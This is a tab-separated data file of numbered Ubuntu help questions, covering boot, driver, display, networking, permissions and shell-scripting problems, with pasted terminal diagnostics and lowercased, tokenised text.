344300	problem with time & date	i have two hard disks in my pc ( 160 gb & 80 gb ) . the 160 gb hard disk has ubuntu 12.04 installed in it while the 80 gb hard disk has windows xp . i added the 80 gb hard disk just a few days ago , before which i was using only the hard disk with ubuntu . before the addition of the second hard disk , the time & date settings worked fine in ubuntu ( it showed the correct time and date every time i booted my pc ) . but now , whenever i boot my system , the time is wrong . even if i set it correctly it becomes wrong the next time i boot my pc . what is causing this problem and how can i resolve it ?
344301	problems with internet connection after installing steam ( ubuntu 13.04 updated )	i installed steam normally , it started the updates and got stuck in the middle of it , i tried to browse internet and it did n't allow me to get a connection , verified if the internet was failing and no , the internet was working , i unplugged the rjpg cable and after re-plugging the internet worked but the problem is that this is happening constantly , the internet is failing , then i have to unplug and re-plug the cable in order to make it work again . help !
344304	logo design for website	can anyone please recommend a tool , preferably free , for designing a logo for a website ? the ones i 've tried using make simple tasks feel very difficult . i want to be able to use textboxes for translating words into pixels ; import existing images ; scale and move everything to fit together .
344308	how to delete sub-folders but keep all the files ?	i 'm wondering if there 's a way on ubuntu to delete all of the subfolders in a folder but keep all the files ?
344309	does anyone know of a linux tool which converts hyper-v snapshots to full memory dump files ?	hyper-v snapshots are comprised of a .vsv file and a .bin file , and i need to convert these in a full memory dump file . i essentially need this tool : http : //archive.msdn.microsoft.com/vm2dmp ... except for linux . anyone know a way of doing this ? thanks !
344312	how to prevent the `` flash is required '' popup from showing in firefox and chrome ?	flash is not , and will not be installed , so firefox and chrome ( and others ) nag me with the flash popup that it is not installed and is needed for certain websites . how do i block or prevent browsers from prompting me to install the flash plugin ? i do not want to install flash .
344316	can i get ubuntu 13.04 64 bit when i have 3gb of ram	i have an intel dual-core cpu 2.0 ghz and 3gb of ram . my motherboard is a dq965gf . i looked at the user manual and saw it supports 64 bit os 's and so does my cpu . i want to know if i can do this and have a decent 64 bit os .
344319	how can i recover data ?	while installing ubuntu 13.04 i have selected replace win7 with ubuntu after installing i have lost all my data that is stored in local disk : d , is there any solution that i can get my lost data , anybody help me pls .
344323	hardware not getting recognized on ubuntu 13.04 after broken boot	i had set the boot preference to usb drive on my desktop which was running on ubuntu 13.04 . yesterday i plugged in a usb and on switching on the comp it started to boot from the usb drive . when i saw that i immediately pulled the usb out ( my bad ! ) and the comp was stuck . but when i re started it , it booted normally but gets stuck on the login screen . the os does not recognize either the keyboard nor the mouse . i tried using boot repair but that did not help . the link that boot repair provided me is http : //paste.ubuntu.com/6092970/ my system is also running win8 and it does n't have any problem . its urgent that i fix it soon so any help would be much appreciated !
344328	what security context software does ubuntu use ?	does ubuntu use selinux by default and if not , how is security context managed ? for example , allowing processes to run as root without security context can be a security risk . the help page about selinux suggests that selinux is a program that needs to be manually installed . so then how does ubuntu handle security context out of the box ?
344337	not able to access folder due to wrong chmod commands	i was not able to view my custom vhost www.ajweb.dev in my apache2 . my www folder resided in /home/ajinkya/www so i did following . ajinkya @ ajinkya-inspiron-3521 : ~ $ cd www ajinkya @ ajinkya-inspiron-3521 : ~/www $ chmod 755 ./www chmod : can not access `./www ' : no such file or directory ajinkya @ ajinkya-inspiron-3521 : ~/www $ chmod 755 ../www ajinkya @ ajinkya-inspiron-3521 : ~/www $ sudo chmod 755 ../www ajinkya @ ajinkya-inspiron-3521 : ~/www $ sudo useradd -g www-data ajinkya useradd : user 'ajinkya ' already exists ajinkya @ ajinkya-inspiron-3521 : ~/www $ sudo chown -r www-data /home/ajinkya/www ajinkya @ ajinkya-inspiron-3521 : ~/www $ sudo service apache2 restart * restarting web server apache2 warning : documentroot [ /home/ajinkya/www/aj/ajweb ] does not exist apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername ... waiting warning : documentroot [ /home/ajinkya/www/aj/ajweb ] does not exist apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername [ ok ] ajinkya @ ajinkya-inspiron-3521 : ~/www $ cd /etc/apache2/ ajinkya @ ajinkya-inspiron-3521 : /etc/apache2 $ cd sites-enabled/ ajinkya @ ajinkya-inspiron-3521 : /etc/apache2/sites-enabled $ ls 000-default 000-default~ ajweb.dev ajweb.dev~ ajinkya @ ajinkya-inspiron-3521 : /etc/apache2/sites-enabled $ sudo gedit ajweb.dev ajinkya @ ajinkya-inspiron-3521 : /etc/apache2/sites-enabled $ sudo service apache2 restart * restarting web server apache2 apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername ... waiting apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername [ ok ] ajinkya @ ajinkya-inspiron-3521 : /etc/apache2/sites-enabled $ and now im not able to view/open that folder manually . ls -l /home/ajinkya | grep www drwxrwxr-x 5 www-data ajinkya 4096 sep 11 15:33 www
344339	how do i convert epub to mobi ?	how do i convert epub to mobi ? can i use calibre for this conversion ?
344340	what problem i have with grub ( grub-install failed ) ?	i tried to install ubuntu 12.04.3 both 64-bits and 32-bits , but in both cases always occurred an error when the installation finish : “executing ‘grub-install /dev/sda’ failed . this is a fatal error.” however , when i installed for example pclinuxos or ubuntu 13.04 , there was no problem with grub even using the same partition scheme . what kind of problem is there ? edit : disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000ea73f device boot start end blocks id system /dev/sda1 * 2048 718847 358400 7 hpfs/ntfs/exfat /dev/sda2 718848 164341759 81811456 7 hpfs/ntfs/exfat /dev/sda3 164341760 527066084 181362162+ 7 hpfs/ntfs/exfat /dev/sda4 527067134 625141759 49037313 5 extended /dev/sda5 619278336 625141759 2931712 82 linux swap / solaris /dev/sda6 568029184 619276287 25623552 83 linux /dev/sda7 527067136 568027135 20480000 83 linux partition table entries are not in disk order and here is the os i have installed in each partition : sda1 for `` system reserved '' ( windows boot ) sda2 for windows 8.1 sda3 for no os sda5 for swap sda6 for /home sda7 for / i verified the md5 of the iso . also , i tried to install with different usb sticks and tried to install another ubuntu-based distro ( elementary os that i think is based on 12.04.2 ) and the problem occurred too . the strangest thing is that i installed ubuntu 12.04 on this laptop in the past but i ca n't now .
344341	server needs new os and i 'm locked out of the servers current os	little background , the server was leased to a company by my dad and was reclaimed by my dad about a year ago and has been sitting around ever since , so im trying to put it to use as a mine craft feed the beast server . the current os on the server ( which is a poweredge 1950 ) is windows server 2003 and i do not have the password to log in . my question is can i burn the ubuntu os to a cd or flash drive and then run the server from one of those and install the os while removing the previous os ? i do n't care about any of the data that was previously on the server and just want a clean slate to work with . any help is greatly appreciated !
344352	how often should i update using apt-get update ?	someone told me to use the command `` apt-get update `` to update my software and hardware updates frequently . what exactly is updated and how often should i update it .
344353	ca n't get normal resolution on ubuntu 13.04 with ati radeon hd 5470	i am trying to get the resolution on an old laptop normal . the laptop is a hp g72-a10sb with a 1600x900 screen , however , i get a stretched-out lower resolution . the only 2 options in system settings > displays are 1024 x 768 ( 4:3 ) ( selected ) and 800 x 600 ( 4:3 ) . here is some information : from the hp website : video graphics : ati mobility radeon hd 5470 graphics ( switchable ) video memory : up to 2714 mb total graphics memory with 1 gb ddr3 dedicated display : 43.9 cm ( 17.3 '' ) diagonal hd+ high-definition led hp brightview display ( 1600 x 900 ) xrandr output : siyck @ siyck-laptop : ~ $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 800 x 600 , current 1024 x 768 , maximum 1024 x 768 default connected 1024x768+0+0 0mm x 0mm 1024x768 61.0* lspci output : siyck @ siyck-laptop : ~ $ lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 02 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 05 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati park [ mobility radeon hd 5430/5450/5470 ] 01:00.1 audio device : advanced micro devices [ amd ] nee ati cedar hdmi audio [ radeon hd 5400/6300 series ] 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) 03:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) 7f:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) 7f:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) 7f:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) 7f:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) 7f:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) 7f:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) no fglrx installed : siyck @ siyck-laptop : ~ $ cd /usr/share/ati bash : cd : /usr/share/ati : no such file or directory just making sure : siyck @ siyck-laptop : ~ $ dpkg -s xorg-driver-fglrx dpkg-query : package 'xorg-driver-fglrx ' is not installed and no information is available use dpkg -- info ( = dpkg-deb -- info ) to examine archive files , and dpkg -- contents ( = dpkg-deb -- contents ) to list their contents . siyck @ siyck-laptop : ~ $ dpkg -s fglrx dpkg-query : package 'fglrx ' is not installed and no information is available use dpkg -- info ( = dpkg-deb -- info ) to examine archive files , and dpkg -- contents ( = dpkg-deb -- contents ) to list their contents . not too sure what this means but i guess it 's not installed : siyck @ siyck-laptop : ~ $ locate fglrx /usr/share/app-install/desktop/fglrx-driver.desktop /usr/share/apport/package-hooks/source_fglrx-installer-experimental-9.py /usr/share/apport/package-hooks/source_fglrx-installer-updates.py /usr/share/apport/package-hooks/source_fglrx-installer.py ca n't add a new mode to xrandr : siyck @ siyck-laptop : ~ $ cvt 1600 900 # 1600x900 59.95 hz ( cvt 1.44m9 ) hsync : 55.99 khz ; pclk : 118.25 mhz modeline `` 1600x900_60.00 '' 118.25 1600 1696 1856 2112 900 903 908 934 -hsync +vsync siyck @ siyck-laptop : ~ $ xrandr -- newmode `` 1600x900_60.00 '' 118.25 1600 1696 1856 2112 900 903 908 934 -hsync +vsync xrandr : failed to get size of gamma for output default x error of failed request : badname ( named color or font does not exist ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 16 ( rrcreatemode ) serial number of failed request : 19 current serial number in output stream : 19 i 'm using gnome3 siyck @ siyck-laptop : ~ $ gnome-shell -- version gnome shell 3.6.3.1 also , the laptop does not detect screens i connect to its vga port . some help or pointers ?
344364	inproper connection using rtl8192cu 802.11n wlan adapter	am using ubuntu 12.10 on a philips mt2400 unit and have a bt homehub2 . have just brought the tp-link wireless n usb adapter ( tl-wn823n ) to replace a belkin that did n't want to play ball . it can see the wireless networks nearby fine and is taking an age on boot up to try and connect to the secure network . several attempts fail and i usually have to switch off the wireless using network via system settings and then back on and if i 'm lucky that solves the issue and i get a connection established . however this is really sluggish and painfully slow often resulting in web pages failing to load with errors as if there is no connection - there is according to network connection @ 65 mbps . anyone able to help , throw solutions or ideas my way to a : speed up the connection and b : get it to establish on first time at boot ? there is not an issue with the home hub as i can log on via another wireless pc and my phone works fine . and when i connect the ethernet up it whooshes along fine , so no broadband issue either . output from sudo lspci -nn : 00:00.0 host bridge [ 0600 ] : intel corporation 82915g/p/gv/gl/pl/910gl memory controller hub [ 8086:2580 ] ( rev 0e ) 00:01.0 pci bridge [ 0604 ] : intel corporation 82915g/p/gv/gl/pl/910gl pci express root port [ 8086:2581 ] ( rev 0e ) 00:1b.0 audio device [ 0403 ] : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) high definition audio controller [ 8086:2668 ] ( rev 04 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 1 [ 8086:2658 ] ( rev 04 ) 00:1d.1 usb controller [ 0c03 ] : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 2 [ 8086:2659 ] ( rev 04 ) 00:1d.2 usb controller [ 0c03 ] : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 3 [ 8086:265a ] ( rev 04 ) 00:1d.3 usb controller [ 0c03 ] : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 4 [ 8086:265b ] ( rev 04 ) 00:1d.7 usb controller [ 0c03 ] : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb2 ehci controller [ 8086:265c ] ( rev 04 ) 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 pci bridge [ 8086:244e ] ( rev d4 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation 82801fb/fr ( ich6/ich6r ) lpc interface bridge [ 8086:2640 ] ( rev 04 ) 00:1f.2 ide interface [ 0101 ] : intel corporation 82801fb/fw ( ich6/ich6w ) sata controller [ 8086:2651 ] ( rev 04 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) smbus controller [ 8086:266a ] ( rev 04 ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation g86 [ geforce 8400 gs ] [ 10de:0422 ] ( rev a1 ) 02:01.0 network controller [ 0280 ] : ralink corp. rt2500 wireless 802.11bg [ 1814:0201 ] ( rev 01 ) 02:02.0 multimedia video controller [ 0400 ] : conexant systems , inc. cx23880/1/2/3 pci video and audio decoder [ 14f1:8800 ] ( rev 05 ) 02:02.1 multimedia controller [ 0480 ] : conexant systems , inc. cx23880/1/2/3 pci video and audio decoder [ audio port ] [ 14f1:8811 ] ( rev 05 ) 02:02.2 multimedia controller [ 0480 ] : conexant systems , inc. cx23880/1/2/3 pci video and audio decoder [ mpeg port ] [ 14f1:8802 ] ( rev 05 ) 02:03.0 communication controller [ 0780 ] : lsi corporation v.92 56k winmodem [ 11c1:048c ] ( rev 03 ) 02:04.0 firewire ( ieee 1394 ) [ 0c00 ] : via technologies , inc. vt6306/7/8 [ fire ii ( m ) ] ieee 1394 ohci controller [ 1106:3044 ] ( rev 80 ) 02:05.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8169 pci gigabit ethernet controller [ 10ec:8169 ] ( rev 10 ) output from lsusb : bus 001 device 002 : id 0bda:8178 realtek semiconductor corp. rtl8192cu 802.11n wlan adapter bus 002 device 002 : id 04f3:0103 elan microelectronics corp . bus 003 device 002 : id 192f:0416 avago technologies , pte . bus 005 device 002 : id 058f:9360 alcor micro corp. 8-in-1 media card reader bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub many thanks in hope and anticipation ...
344366	where is the video dynamic range	this is dynamic range in windows i ca n't find dynamic range in linux nvidia x server .
344367	default to adm group for upstart logs	this bug suggests that on 12.04 , the default permissions for upstart logs do not allow rsyslogd to read them : https : //bugs.launchpad.net/ubuntu/+source/upstart/+bug/1074564 that is the logs need to be readable by group 'adm ' ( or is it 'syslog ' ? ) . it 's simple enough to change the group for any given log file , but how do i make it persistent such that any rotated or newly created logs get the right group ?
344369	where to find the disk image mounter ? is not in dash , where it is ?	i 'm running ubuntu 13.04 . disk image mounter is installed , but not located in the `` dash '' where can find this utility to use ?
344370	is there any way to install latest nautilus file manager in ubuntu 12.04 lts	i am so desperate to use nautilus file manager 3.6 or above in ubuntu 12.04 lts . i have tried a lot of ways but finally tired to ask this question . i went for this link : how do i install nautilus 3.6 in 12.10 ? but it was not my solution . i tried to install using binary package downloaded from here but it was so difficult to resolve all dependency packages . the list was not going to end . i tried to add repository : ppa : gnome3-team/gnome3 but it says : nautilus is already the newest version . nautilus is by default in ubuntu 13.04 . its features like search files and folder and lighting speed make me mad . but unfortunately i want to stick with ubuntu lts version . edit i do n't know how but following link shows files ( nautilus ) 3.6 installed in ubuntu 12.04 : files ( nautilus ) 3.6.0 final available for download now my excitement has reached to its peak . is there really a way to install latest version in ubuntu 12.04 ? any help will be greatly appreciated . thanks in advance ! ! edit : tried to install as suggested by roman raguet first step executed without any error and installed listed packages successfully . when executed 2nd step : sudo apt-get build-dep nautilus got following error : e : unable to find a source package for nautilus so thought to skip this and continue with next step . 3rd step also executed successfully and downloaded and installed around 40 to 50 mb of packages . skipped 4th step , thought it as not that much important ( ok if trash icon does n't appear ) . finished 5th , 6th and 7th step and reached to 8th step . when compiled using ./configure got errors as shown following : saurav @ saurav-p4i45gx-pe : ~/downloads/src/nautilus-3.6.3 $ ./configure checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... gawk checking whether make sets $ ( make ) ... yes checking how to create a ustar tar archive ... gnutar checking whether make supports nested variables ... yes checking whether to enable maintainer-specific portions of makefiles ... yes checking for style of include used by make ... gnu checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking dependency style of gcc ... gcc3 checking how to run the c preprocessor ... gcc -e checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking whether byte ordering is bigendian ... no checking for an ansi c-conforming const ... yes checking for gcc ... ( cached ) gcc checking whether we are using the gnu c compiler ... ( cached ) yes checking whether gcc accepts -g ... ( cached ) yes checking for gcc option to accept iso c89 ... ( cached ) none needed checking dependency style of gcc ... ( cached ) gcc3 checking how to run the c preprocessor ... gcc -e checking whether ln -s works ... yes checking whether make sets $ ( make ) ... ( cached ) yes checking build system type ... i686-pc-linux-gnu checking host system type ... i686-pc-linux-gnu checking how to print strings ... printf checking for a sed that does not truncate output ... /bin/sed checking for fgrep ... /bin/grep -f checking for ld used by gcc ... /usr/bin/ld checking if the linker ( /usr/bin/ld ) is gnu ld ... yes checking for bsd- or ms-compatible name lister ( nm ) ... /usr/bin/nm -b checking the name lister ( /usr/bin/nm -b ) interface ... bsd nm checking the maximum length of command line arguments ... 1572864 checking whether the shell understands some xsi constructs ... yes checking whether the shell understands `` += '' ... yes checking how to convert i686-pc-linux-gnu file names to i686-pc-linux-gnu format ... func_convert_file_noop checking how to convert i686-pc-linux-gnu file names to toolchain format ... func_convert_file_noop checking for /usr/bin/ld option to reload object files ... -r checking for objdump ... objdump checking how to recognize dependent libraries ... pass_all checking for dlltool ... dlltool checking how to associate runtime and link libraries ... printf % s\n checking for ar ... ar checking for archiver @ file support ... @ checking for strip ... strip checking for ranlib ... ranlib checking command to parse /usr/bin/nm -b output from gcc object ... ok checking for sysroot ... no checking for mt ... mt checking if mt is a manifest tool ... no checking for dlfcn.h ... yes checking for objdir ... .libs checking if gcc supports -fno-rtti -fno-exceptions ... no checking for gcc option to produce pic ... -fpic -dpic checking if gcc pic flag -fpic -dpic works ... yes checking if gcc static flag -static works ... yes checking if gcc supports -c -o file.o ... yes checking if gcc supports -c -o file.o ... ( cached ) yes checking whether the gcc linker ( /usr/bin/ld ) supports shared libraries ... yes checking whether -lc should be explicitly linked in ... no checking dynamic linker characteristics ... gnu/linux ld.so checking how to hardcode library paths into programs ... immediate checking whether stripping libraries is possible ... yes checking if libtool supports shared libraries ... yes checking whether to build shared libraries ... yes checking whether to build static libraries ... no checking for pkg-config ... /usr/bin/pkg-config checking for floor in -lm ... yes checking locale.h usability ... yes checking locale.h presence ... yes checking for locale.h ... yes checking for lc_messages ... yes checking libintl.h usability ... yes checking libintl.h presence ... yes checking for libintl.h ... yes checking for ngettext in libc ... yes checking for dgettext in libc ... yes checking for bind_textdomain_codeset ... yes checking for msgfmt ... /usr/bin/msgfmt checking for dcgettext ... yes checking if msgfmt accepts -c ... yes checking for gmsgfmt ... /usr/bin/msgfmt checking for xgettext ... /usr/bin/xgettext checking pkg-config is at least version 0.16 ... yes checking whether nls is requested ... yes checking for intltool > = 0.40.1 ... 0.50.2 found checking for intltool-update ... /usr/bin/intltool-update checking for intltool-merge ... /usr/bin/intltool-merge checking for intltool-extract ... /usr/bin/intltool-extract checking for xgettext ... ( cached ) /usr/bin/xgettext checking for msgmerge ... /usr/bin/msgmerge checking for msgfmt ... ( cached ) /usr/bin/msgfmt checking for gmsgfmt ... ( cached ) /usr/bin/msgfmt checking for perl ... /usr/bin/perl checking for perl > = 5.8.1 ... 5.14.2 checking for xml : :parser ... ok checking for gtkdoc-check ... no checking for gtkdoc-rebase ... no checking for gtkdoc-mkpdf ... no checking whether to build gtk-doc documentation ... no checking for perl5 ... no checking for perl ... perl checking for glib-genmarshal ... /usr/bin/glib-genmarshal checking sys/mount.h usability ... yes checking sys/mount.h presence ... yes checking for sys/mount.h ... yes checking sys/vfs.h usability ... yes checking sys/vfs.h presence ... yes checking for sys/vfs.h ... yes checking sys/param.h usability ... yes checking sys/param.h presence ... yes checking for sys/param.h ... yes checking malloc.h usability ... yes checking malloc.h presence ... yes checking for malloc.h ... yes checking for mallopt ... yes checking for exif ... yes checking for exempi ... yes checking for is_selinux_enabled in -lselinux ... no checking for more warnings ... no checking for tracker ... yes checking for base ... no configure : error : package requirements ( gtk+-3.0 > = 3.5.12 glib-2.0 > = 2.33.13 ) were not met : no package 'gtk+-3.0 ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables base_cflags and base_libs to avoid the need to call pkg-config . see the pkg-config man page for more details .
344372	how do i get the xorg folder so i edit my mouse ?	okay so i 'm new to xubuntu and i 'm trying to get rid of the mouse acceleration like windows has it but i 've been told that i need to edit files in xorg first . but the folder is not there and i ca n't right-click and make it because of permissions . i 've tried doing sudo -x configure but i get : fatal server error : server is already active for display 0 if this server is no longer running , remove /tmp/.x0-lock and start again . is there anyway to get the folder back ?
344374	macbook pro 8,2 - wireless works without the n	using ubuntu 13.04 on a macbook pro 8,2 2011 i 've almost fully switched to linux from os x and there is one last thing i ca n't figure out . i installed my wireless driver and it works fine , however the connection is wireless g only , not n. i need/want the n connection for 2 reasons : utilize the hardware i have to its full extent . my internet is 50mbps , so having a max connection of 54mbps via wireless g is not enough . is there a driver i need to contribute to make this happen , or is something else going on which i need to activate ? my router is the new a/c airport extreme and its setup properly . any help or pointing me in the right direction would be greatly appreciated !
344376	ubuntu 12.04 lts wo n't play dvd 's	i am a bit of a novice at this so please keep your answers as simple as possible.i have a z91f laptop onto which i installed ubuntu 12.04 lts . i also had to replace the old cd drive with a reconditioned dvd multi recorder rw drive . i am able to play music cd 's ok through rhythmbox but when a dvd is inserted a few clicks are heard followed by a short spin followed by more clicks and searching of the dvd.the dvd then stops.no window opens up at all.i have read some of the comments already made about installing sudo apt-get install libdvdread4 and then sudo /usr/share/doc/libdvdread4/install -css.sh as a possible solution to my problem . but how do i actually do this ?
344378	problems with digital input of esi juli @ xte pci soundcard	i 've got an esi juli @ xte pci soundcard and want to use it on ubuntu 12.04 server . it 's going to be a capture device only . it 's used in a small free radio station . i want to use two analog inputs to capture the live radio program and the digital spdif ( coaxial ) in for streaming via darkice ( icecast2 client ) at the same time . i got the analog inputs working well with arecord , but i'do n't have a clue how to use the coaxial spdif in for the stream at the same time . i tried different audio device settings , to stream the digital in , but with no success ( plughw:0,1 , iec958:0,0 , dsnoop , dmix ... ) . does anybody know how to detect the right device adress ? here are some more details : root @ audio : ~ # arecord -l null discard all samples ( playback ) or generate zero samples ( capture ) default : card=juli esi juli @ , ice1724 default audio device sysdefault : card=juli esi juli @ , ice1724 default audio device front : card=juli , dev=0 esi juli @ , ice1724 front speakers surround40 : card=juli , dev=0 esi juli @ , ice1724 4.0 surround output to front and rear speakers surround41 : card=juli , dev=0 esi juli @ , ice1724 4.1 surround output to front , rear and subwoofer speakers surround50 : card=juli , dev=0 esi juli @ , ice1724 5.0 surround output to front , center and rear speakers surround51 : card=juli , dev=0 esi juli @ , ice1724 5.1 surround output to front , center , rear and subwoofer speakers surround71 : card=juli , dev=0 esi juli @ , ice1724 7.1 surround output to front , center , side , rear and woofer speakers iec958 : card=juli , dev=0 esi juli @ , ice1724 iec958 ( s/pdif ) digital audio output dmix : card=juli , dev=0 esi juli @ , ice1724 direct sample mixing device dmix : card=juli , dev=1 esi juli @ , ice1724 iec958 direct sample mixing device dsnoop : card=juli , dev=0 esi juli @ , ice1724 direct sample snooping device dsnoop : card=juli , dev=1 esi juli @ , ice1724 iec958 direct sample snooping device hw : card=juli , dev=0 of different also-tool outputs : esi juli @ , ice1724 direct hardware device without any conversions hw : card=juli , dev=1 esi juli @ , ice1724 iec958 direct hardware device without any conversions plughw : card=juli , dev=0 esi juli @ , ice1724 hardware device with all software conversions plughw : card=juli , dev=1 esi juli @ , ice1724 iec958 hardware device with all software conversions cat /proc/asound/cards root @ audio : ~ # cat /proc/asound/cards 0 [ juli ] : ice1724 - esi juli @ esi juli @ at 0xc0e0 , irq 10 if you need more information , please let me know .
344380	how to disable fast boot on asus zenbook for efi boot	i have been trying to install ubuntu 12.04 alongside windows 7 on my asus ux52a zenbook . i get the following error message : grub installation failed the 'grub-efi-amd64-signed ' package failed to install into /target/ . without the grub boot loader , the installed system will not boot . i 've been trying to follow the instructions at https : //help.ubuntu.com/community/uefi , but i ca n't figure out how to disable fastboot and intel srt . i can enter setup during post , but i do n't see these options anywhere . anyone know where to find them ?
344384	how to install ocaml 4.0 using apt-get on ubuntu 13.04	when i type the following command in to terminal sudo apt-get install ocaml i only get 3.12 version . how can i install 4.0 version via apt-get ? i can not access the source drop because of some firewall issues .
344389	i want to install ubuntu 13 on the last drive , along side windows 7 via usb stick	i know exactly how to install ubuntu by wubi alongside windows 7 , but actually as have free space and want to install it on the last drive , how can i tell ubuntu to be installed on drive `` i '' , means what i 'm seeing is sda lyk stuff ... all i want to know is how can i install on last drive `` i '' along with working windows 7 without deleting or formatting other drive , as i have important and useful data there at present . drive `` i '' is free and has 17gib
344391	multi monitor : why does a `` dragged for fullscreen '' window open on another monitor ?	i 'm a first time ubuntu user , and i 'd thought i 'd give it a try . i have 3 monitors , i have them all configured to my liking and everything so i started playing around and i tried dragging my google chrome to the top of the screen so i can make it go full screen on my middle monitor . it shows the orange box as if it 's going to go fullscreen on my middle monitor , then once i release my mouse it will go full screen on my left monitor . what can i do to fix this ?
344392	ubuntu , installing qt 5.1.1	i just installed windows 8 , ubuntu twice because it failed the first time somehow ( could n't start from grub ) . however , now everything works fine . the only exception is that i can not install qt 5.1.1 . i downloaded the latest qt version from their homepage for linux 64 bit ( around 415 mb ) . the only problem is , i can not start the application . i checked this in the permissions of the installer . `` execute : ( checked ) allow executing file as program '' it still wo n't start . i tried to open it with terminal and sudo . this is the output : david @ lw-gd-45 : ~/downloads $ sudo ./qt-linux-opensource-5.1.1-x86_64-offline.run ./qt-linux-opensource-5.1.1-x86_64-offline.run : 3 : ./qt-linux-opensource-5.1.1-x86_64-offline.run : syntax error : unterminated quoted string what am i doing wrong ? worked fine in linux mint ...
344393	problems running unity and graphical applications with nvidia optimus	i 'm having a lot of trouble getting ubuntu 12.04 lts running smoothly on my laptop . the computer has nvidia optimus , with an integrated hd4000 and a discrete nvidia gtx 765m . initially i was just getting a black screen on startup ; i installed bumblebee and can now get to the desktop if i add the nomodeset argument ( nomodeset did n't work by itself without bumblebee ) . now : 1 ) unity does n't start , and trying to open it manually gives me errors ; 2 ) additional drivers says that the nvidia graphics driver is activated but not in use ; 3 ) trying to run glxgears or glxspheres gives me this error : xlib : extension `` glx '' missing on display `` :0.0 '' . error : could n't get an rgb , double-buffered visual 4 ) trying to run 'optirun glxgears` gives me this error : [ 2028.461627 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) nvidia ( 0 ) : failed to initialize the nvidia gpu at pci:1:0:0 . please [ 2028.461673 ] [ error ] aborting because fallback start is disabled . i 've spent all day reading through posts about problems with optimus , but nothing so far has helped .
344405	cant boot ubuntu 13.04 next to windows 8	i installed ubuntu 13.04 next to windows 8 . on another hdd with two partitions . one for my windows data and one for ubuntu . now i cant choose which system i want to boot . i get directly into windows 8 . i installed the ubuntu bootloader to the hdd , is that right . even if i choose that hdd in bios there is only a black screen with a blinking _ thank you
344407	how to read complete line in 'for ' loop with spaces	i am trying to run a for loop for file and i want to display whole line . but instead its displaying last word only . i want the complete line . for j in `cat ./file_wget_med` do echo $ j done result after run : found . here is my data : $ cat file_wget_med 2013-09-11 14:27:03 error 404 : not found .
